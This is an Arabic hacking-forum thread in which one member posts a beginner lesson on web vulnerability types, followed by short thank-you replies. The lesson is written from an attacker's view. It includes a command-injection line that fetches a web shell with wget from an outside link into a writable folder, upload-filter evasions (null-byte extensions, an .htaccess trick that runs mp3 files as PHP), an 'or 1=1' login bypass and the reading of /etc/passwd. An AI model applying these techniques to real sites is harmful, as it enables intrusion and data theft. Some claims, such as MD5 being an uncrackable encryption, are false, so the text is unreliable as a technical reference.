حالة الموضوع:
مغلق
  1. مـ☻ـجـ☻ـآهـ☻ـد

    مـ☻ـجـ☻ـآهـ☻ـد <span style="background-color: #E0921B"><span styl DeveloPer Plus

    الأنتساب:
    ‏30 مارس 2012
    المشاركات:
    152
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الإقامة:
    {ĜäŽã}
    السلام عليكم ورحمة الله وبركاته
    درس عن انواع الثغرات .:. وشرح مبسط عنها لتاخذ نضرة بسيطة عن هذه الثغرات لكي تتكون
    براسك بعض المعلومات المهمة عنها .:.
    :.: بسم الله الرحمن الرحيم :.:
    .:. الثغرات عبارة عن اخطاء يقع فيها مصممين البرامج او السكربتات
    يعني مثلا المنتدى هو سكربت .:. او سكربت الصور .:. او سكربت مركز التحميل .:. او سكربت مكتبة البرامج .:. وغيرها الكثير
    المهم .:. انواع الثغرات .:. الثغرات كثيرة جدا بعضها معروف والبعض الاخر غير معروف .:. ايضا هناك ثغرات قوية محتكرة للهكر المحترفين .:.
    وايضا هناك ثغرات جميلة ومتعبة من ناحية التنفيذ والاستغلال وشرحها سيطول فلم اضع منها اي نوع من هذه الثغرات .:.
    سوف نشرح شرح بسيط عن الثغرات المعروفة .:.
    بس احب اذكركم .ان الثغرات انواع وتختلف خطورتها .:. باختلاف نوع الثغرة واصدارها.:.
    المهم اول شي يجب ان تعرفه الريموت واللوكال
    اللوكال.local. تكون اللوكال وانت محلي على السيرفر وتسمى باللوكال .هذا النوع يقصد به محلي يعني انك لازم تكون على الشل مثلا يعني متواجد على السيرفر .:.
    الريموت.remot. وهي تسمى بالسيطرة عن بعد وهذا النوع اخطر من اللوكال .ويقصد به التحكم عن بعد وانت على جهازك تشغل الثغرة على الموقع ايا كان نوع او طريقة عمل الثغرة راح تشتغل معك .:.
    -----------------------------------------------------------------------------------------
    ثغرات الفايل انكلود :::Remote File Inclusion Vulnerability.:.من اشهر الثغرات قوة . لكنها اصبحت قديمة وصعب انك تلاقيها .:. بس لا تفقد الامل يمكن تلاقيها في بعض المواقع .:.
    هذا النوع من الثغرات .يقصد بها ان مصمم السكربت قد وقع في خطا برمجي وهذا الخطا يسمح لنا (((( بربط ملف خارجي بالموقع )))
    ما هو الملف الخارجي؟؟ (((( الشل او اي اداه اختراق ))))).
    اما عن كيفية اكتشافها فهي صعبة .:. لكككن من لديه خبرة في لغة php او اللغات البرمجة الاخرى
    فيمكنه اكتشافها بتنزيل السكربت عندة والبحث عنها في السكربت يدويا او عن طريق بعض البرامج التي اثبتث جدارتها في البحث عن ثغرات الفايل انكلود.:.:.:.
    هذه الثغرة مشرروحة بكثرة في منتدانا .:. لانها سهله هعهعهعهع .:. فلن اشرح عنها اكثر
    --------------------------------------------------------------------------------------
    ثغرات قواعد البيانات :::: SQL Injection ايضا اصبحت هذه الثغرة من الثغرات القوية .:. وهي حسب النتائج اصبحت ثغرة هذا الوقت .:.
    وتمكننا هذه الثغرة من معرفة معلومات مهمة ومختلفة .:. حسب العمل الذي تقوم به .:. اقرب مثال لهذه الثغرة .. معرفة اسم الدخول وكلمة المرور لمدير الموقع
    وهي مشروحة من الاخ الشبح الدموي عنها في دروس جيدة وهي ممتازة للمبتدئين .:. لكن سوف نشرح عنها بعيدا عن دروس الشبح الدموي لانها ثغرة الوقت مثل ما قلنا في البداية.:.
    هذا النوع من الثغرات تعتمد على اخطاء السكربتات التي تتعامل مع قواعد البيانات .:. قواعد البيانات شرحنا عنها في قسم المبتدئين .:.
    قاعدة البيانات تحتوي عى معلومات مهمة جدا مثلا تحتوي على على اسماء والباسورد لمستعملي الموقع واهم شي هو باسورد الادمن اي باسورد صاحب الموقع
    وعند استطاعتنا الحصول على الباسورد هنا نقف عند نوع التشفير .:. فاذا كان الباسورد مشفر تشفير (md5) وهو اصعب تشفير في مجال المواقع ولا اعتقد ان هناك برامج تفك هذا التشفير
    100% 100 .:.:. هناك سكربتات لتشفير الرقم السري الى (md5) بمجرد ما تضع الرقم السري راح يحولة الى 32 .:.
    لكن هناك بعض البرامج التي تفك لك التشفير 90%100 لكن بوجود السالت تبع الادمن وهي الكلمة السرية لتذكر الباسورد عند نسيانة .:. عن طريق التخمين
    يعمل التخمين بتقنية المقارنة .:. اي تعطيه الباسورد المشفر ويبدا المقارنة فاذا كانت المقارنة هي التساوي .:. اذا قد تم فك التشفير .:.
    ولاستكشاف هذه الثغرة يجب ان تنفذ الاستكشاف عن رابط يكون له اتصال بقواعد البيانات



    ------------------------------------------------------------------------------------
    ثغرات XXS :::: Cross-Site Scripting .:. هذه الثغرة نستطيع من خلالها تنفيذ الكثير .:. لكن يجب ان تعرف هذه اللغات
    (html) او (جافا سكربت .**********) يعني بامكانك تنفيذها باي مكان فيه ادراج كتابة .مثلا ادراج الكود في الاهداء
    عن طريق هذا الكود (مو شرط ايكون هذا)>>>


    كود PHP:
    ***************(’iq-team.org’)</script>

    فاذا ضهر مربع تحذير فان الثغرة شغالة ..
    .:.: بعض الاستغلات لهذه الثغرة...
    سحب كوكيز اعضاء الموقع
    تلغيم الموقع
    اضافة اي كود جافا سكربت .:. ولغة الجافة بلوى او بالاصح مشكلة .:. يعني اذا لقيت هذه الثغرة في موقع بهذه اللغة ستسقط الموقع .:. وغيرها من الاستغلالات.:.
    بلغة (html) او (جافا سكربت .
    script) .:.:
    ايضا هذه الثغرة مشروحة اعتقد من قرصان العراق في قسم .:. حماية المواقع .:. ولا يحتاج اشرحها كاملا.:.
    و هذه الثغرات تنقسم الى ( الدوم والبريسنت والنان بريسنت)...ok
    -----------------------------------------------------------------------------------
    ثغرات الرفع :::: Remote File Uploed .:. هذه الثغرات تمكننا من رفع ملف على الموقع .:. ثغرات مراكز التحميل .:.
    وهذه الثغرات بالنسبة للمبتدئين من اسهل الثغرات يعني بسهولة ثغرة فايل انكلود .:. لكن الاختلاف ان هذه الثغرات بعدها شغالة على بعض مراكز التحميل
    يعني تعتمد على نوع السكربت الذي يستخدمه مركز التحميل .:.
    بمجرد انك ترفع الشل و تاخذ الرابط وتضعه في المتصفح راح يشتغل .:. وفي بعض المرات تحتاج الى خداع المركز من ناحية الامتداد
    بحيث يكون امتداد الشل .:. هكذا .:. r57,php,rar او \c99.php%00.jpg او غير امتداد .:.
    او مثلا اذا كان هناك مركز تحميل الاغاني بمجرد انك ما ترفع ملف مثل ملف htaccess. وتضع به اكواد مختلفة لاستقبال الملفات مثل كود يشغل ملفات الام بي اثري كملفات php
    وبعد رفعه اتروح ترفع ملف الشل الي هو php بعد تحويل صيغته ال mp3 وترفعه على المركز .:. هعععععععععععع وراخ يشتغل معاك.:.
    بعض منها شغالة على مراكز التحميل .:.
    وهناك عشرات الطرق لتخطي مراكز التحميل واختراق الموقع نفسه .:. وهذا شرح بسيط عنها .:. ايضا بعض الطرق مشروحة في هذا المنتدى .:.
    ----------------------------------------------------------------------------------
    ثغرات ::::::::::: Command Execution .:. هذه الثغرات تشبه ثغرات الفايل انكلود ولكن الاختلاف انك ما راح تضيف اداه الاختراق باحد
    المتغيرات المصابة .:. بل تمكننا هذه الثغرة من كتابة اوامر ((linux)) اي اوامر نضام لينكس اي اوامر الشل ... يعني
    تسمح لنا باعطاء اوامر للسيرفر.:.بالاصح التحكم بالسيرفر حسب الصلاحية .:. مثلا امر اضهار ملفات الموقع dir او ls او اضهار صلاحيتك عبر الامر id .. الخ
    يعني مثلا نحن في هذا المسار .:.

    كود PHP:
    www.iq-team.org/index.php?id=commande

    بدال كوومناد نضع الامر لينكس اذا كان السيرفر لينكس يعني اذا اردنا ان نعرف مكاننا على السيرفر بالامر pwd/

    كود PHP:
    www.iq-team.org/index.php?id=pwd
    ثم انشوف الملفات وتصاريحها بالامر ls -la
    ومن تلاقي مجلد له تصريح 777 مثلا المجلد data في تصريح 777 .:.التصاريح مشروحة من اخونا القرصان في قسم المبتدئين .:.
    تدخل للمجلد بالامر cd وتسحب الشل بالامر wget .:. مثلا هكذا.:

    كود PHP:
    cd home/domains/iq-team.org/public_html/vb/data;wget http://link[shell.zip


    هنا نفذنا امرين امر الدخول للمجلد وامر السحب ووضعنا الامرين معا بالعلامة [;]
    حسنا بعد التاكد من سحب الشل انفك ضغط الشل باالامر unzip shell.zip .:.
    الان راح يعمل معاك الشل بمجرد تاخذ مسار الشل الذي وضعته في المجلد وتضعه بعد رابط الموقع .:. وهكذا .:.
    وهناك شروحات اخرى عنها .:.
    ---------------------------------------------------------------------------------
    ثغرات :::: File Disclosure .:. وهي الثغرات التي نستطيع من خلالها قرائة ملفات الموقع الهدف وهي كذلك تشابة كثيرا
    الثغرة الي فوق .:.
    وهذه الثغرة تمكننا في بعض االاحيان السيطرة على السيرفر كاملا .:. اي بالاصح قرائة الملفات المهمة مثل ملفات
    (etc/ (passwd,valiases وبالامكان ايضا قرائة ملفات اي موقع بالسيرفر حسب مكانه في السيررفر .:.
    ---------------------------------------------------------------------------------
    ثغرات البوفر اوفر فلو :::: buffer overflow .:..:. هذه الثغرات تحصل بسبب خلل برمجي باالاصح (غفلة من مصمم السكربت)في السكربت او البرنامج
    مثلا دخلنا على احد السكربتات وطلب منا ان ندخل الاسم .:. ومبرمج السكربت طلب من البرنامج ان عدد الاحرف لاسم المستخدم لن يتجاوز 20
    يعني معقولة في اسم يتجاوز عشرين حرف او مثلا اسم عضو يتجاوز ثلاثين حرف .:. مو معقولة .:.
    حسنا .:. متى تحصل الثغرة .:. عندما ندخل مثلا 100 او 150 حرف كاسم للمستخدم .:. البيانات اذي ادخلناها ستكون زائدة جدا فسيحصل طفحان وهو يسمى
    ""overflow"" في ذاكرة التي خصصت لمتغير الاسم .:.
    هذه الثغرات ترشدنا الى معلومات اخرى .:. منها= المعالجة (proccess) فالمعالجة هي المسئولة عن العمليات التي تحصل في الحاسبة
    ولكل عملية تحصل في الحاسبة لها عنوان فاضي في الذاكرة .:. ولا يمكن لاي عملية او برنامج اي يدخل الى هذه الذاكرة المخصصة لتلك العملية .:.
    ايضا يجب عينا ان نذهب لنقرا القليل عن ادارة الذاكرة (memory management) عندما يكون لدينا عدد كبير من العمليات موجهة الى الذاكرة الحقيقة .:.
    وفي نفس الوفت الذاكرة الحقيقة اصغر من كمية المهام الموجهة للذاكرة الحقيقة .:.ستحصل مشكلة ؟؟ اليس كذلك.:.
    استغلال هذه الثغرات يكون . عندما ندخل بيانات اكبر حجما من الذاكرة التي خصصت لهذه البيانات .:. فان البيانات الزائدة ستفيض في الذاكرة بعد المتغير ؟؟ من هذا المكان في الذاكرة
    سوف نستفاد من هذه الثغرات .:. وهذه الدروس موجودة او ابحث عنها في كوكل .:.وا انتضرونا منانة لسنة اذا كان في مجال بنسوي ادروس هههههههههههههع
    ربي يسهلها لكم جميعا ولكل من ناوي يتعلم لافادة الاسلام والمسلمين .:.
    ايضا بالامكان عن طريق هذه الثغرات ان ناخذ روت بدون ما نرفع شل اصلا .:.
    --------------------------------------------------------------------------
    ثغرات :::Remote Dump Database .:او:. Data**** Backup Dump Vulnerability :::
    هذه الثغرات تعمل على حسب انواع السكربت واصداراتها .:. مثل ما قلنا لكل اصدار او سكربت ثغرة وطرق عدة لاستغلالها.:.
    هذا النوع من الثغرات وهو خاص بسحب باك اب لسكربت معين او نسخ قواعد بيانات كاملة .:.
    من خلال ملف سواء ان يكون مجلد الادمن او اي مجلد وضيفته سحب المعلومات من جداول قاعدة البيانات
    ومن خلالها سحب الملعومات المهمة الموجودة في users ..الخ..
    فكرة الثغرة انها تقوم باخذ باك اب للسكربت الموجود ومن خلالها سوف نقراء المعلومات المهمة .:.
    مثلا اذا سحبنا ملف قاعدة البيانات للمنتدى .:. ايش استفدنا .:. اليوزر والباس المشفر هع للادمن .:. ومواقع الفك كثيرة جدا
    اغلب الملفات تبع الباك اب يختلف مسارها لكن الاغلب في مجلد :admin:
    واسماء الملفات ايضا الاغلب تكون هكذا ::backup.php or upgrade.php :: هي بالاصل تعتمد على مبرمج السكربت وتسميته ملفاته .:.
    ---------------------------------------------------------------------------------------------
    ثغرات :::bypass admin control panal :.او.: Bypass ::::
    هذه الثغرات تسمح لنا بتجاوز لوحة التحكم control panal تبع الادمن . اي تخطي صفحة طلب الباسبورد والاسم المرخص لهم بدخول لوحة تحكم .:.
    طريقة {{{{{ or 1=1}}}}}}}}}}} حسب الرموز التي تدخلها والرموز كثيرة جدا .:. او عن طريقة الدخول على اي ملف من ملفات المجلد من خلال السكربت
    ويمكن نتخطاها بهذه الطريقة .:. هذه الثغرة لها الكثير من الطرق وشرحها سيطول .:. لكن من باب الاستفادة ذكرتها لكم.:.
    -------------------------------------------------------------------------------------------
    ثغرات ::: Remote Admin Password Change .:. اي تغيير كلمة السر من التحكم البعيد .:.
    هذا النوع مشهور واقرب مثال له هي ثغرة سكربت جوملة token joomal هذه الثغرة تسمح لنا بتغيير باسورد
    مدير الموقع .:. بدون الحاجة لمعرفة الباسورد القديم . ايضا هناك طريقه جديدة عن هذه الثغرات من اكتشاف احد العباقرة الفلنديين
    عجبتني الطريقة عبر مشاهدتها عبر احد الشروحات له وهي بوضع اكواد مختلفة من كافة لغات البرمجة ثم يبدا بتشفيرها .تشفير جديد لم اعرفه..:.ايضا ذكرتها من باب الاستفادة .:.
    ------------------------------------------------------------------------------------------
    ----------------------------------------------------------
    المهم اخوان هذه الثغرات المعروفة هي جزء من كثير من الثغرات .:. ولكل ثغرة طرق اخرى في الاختراق .:.
    وهذه بعض الطرق التي تتم مناقشتها من قبل الهكرز المحترفين .:.
    1-Data center Attack .:. وهو سحب بيانات الداتا سنتر التي تدعم الموقع .:.
    2-DNS Attack .:. هذه الطريقة تعتمد على تحويل DNS الداعم للسيرفر
    3-penetration of Domain .:. باين من اسمة (وهو اختراق الدومين للموقع المستهدف (بعدة طرق)).:.
    4-Remote Root .:. هذه الطريقة تعتمد على الحصول على الروت من غير شل وهي عن طريق بعض الطرق ومن هذه الطرق
    شرحت عنه وهي (buffer over flow) وغيرها .. الخ
    5-ddos attack .:. وهي عملية حجب الخدمة ايضا تكون بعدة طرق .:.
    6-Server Mail supporter .:. هذه طرق حديثة تعتمد على وضع اكواد لتغيير الايميل الداعم للسيرفر .:.
    7-Cpanel Commands .:. هذه الطريقة تعتمد على تنفيذ بعض الاوامر من خلال عمل ادوات تطابق (cpanel) وتنفيذ الاوامر منها .:. واكيد راح تتمكن من رفع الاندكس تبعك
    او التعديل في الموقع .:
    8- xss .:. نوع جديد وهو قليل من يعرفون عنها .وذو طريقة فعالة .
    وهناك الكثير ايضا من الطرق .:. لكن الشي الاخير هو يجب ان تعتمد على ما اعطاك ربك وهو عقلك .:.
    ------------------------------------------------------------------------
    انشوفكم بخير يالطيبين .:. الدروس القادمة اقوى لمرحلة المتوسطين .:. ولاي سوال ضع سوالك في القسم المناسب
    وستتم الاجابة عليه باذن الله من قبل الاعضاء القديرين :{1}:
     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. ĉľùЪłŚŦłÅņθ

    ĉľùЪłŚŦłÅņθ Developer

    الأنتساب:
    ‏11 يونيو 2012
    المشاركات:
    50
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    تــــg نـــس الــحــرة
    رد: درس عن انواع الثغرات المفهوم البسيط للثغرات

    مآشآء آلله تبآرك آلله ...

    شرح كآمل متكآمل ...

    ويعطيك الف عآفيه ...

    تقبل مروري ...
     
  4. BLaCk HoLe

    BLaCk HoLe Developer

    الأنتساب:
    ‏9 أغسطس 2012
    المشاركات:
    36
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    In K.S.A
    رد: درس عن انواع الثغرات المفهوم البسيط للثغرات

    بارك الله فيك

    ونتظر منك الجديد
     
  5. MR.X7

    MR.X7 Developer

    الأنتساب:
    ‏9 مايو 2012
    المشاركات:
    44
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الوظيفة:
    طالب [3 ثنوي]
    الإقامة:
    مكة المكرمة
    رد: درس عن انواع الثغرات المفهوم البسيط للثغرات

    واَصل يا بطل ولا تحرمنا
     
  6. ŦђĘ βě$Ţ

    ŦђĘ βě$Ţ Developer

    الأنتساب:
    ‏4 مارس 2013
    المشاركات:
    98
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: درس عن انواع الثغرات المفهوم البسيط للثغرات

    السلام عليكم
    يعطيك العآفيه أخوي
     
  7. sahdy18

    sahdy18 Developer

    الأنتساب:
    ‏14 نوفمبر 2011
    المشاركات:
    29
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    طالب
    رد: درس عن انواع الثغرات المفهوم البسيط للثغرات

    يعطيك العافيه ما قصرت
     
  8. Jankaro

    Jankaro Developer

    الأنتساب:
    ‏22 نوفمبر 2012
    المشاركات:
    52
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    EgYpT
    رد: درس عن انواع الثغرات المفهوم البسيط للثغرات

    باركـ الله فيــك على الطرح يا غالي
     
  9. GO HacKer

    GO HacKer DeveloPer Plus

    الأنتساب:
    ‏16 يوليو 2013
    المشاركات:
    143
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    18
    رد: درس عن انواع الثغرات المفهوم البسيط للثغرات

    مشكوور لبى قلبك رمضان مبارك و تقبل تحياتي .... ~:{1}:​
     
  10. katalooni

    katalooni Developer

    الأنتساب:
    ‏16 ديسمبر 2013
    المشاركات:
    52
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    RooT
    رد: درس عن انواع الثغرات المفهوم البسيط للثغرات

    شكرا عالنقل
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة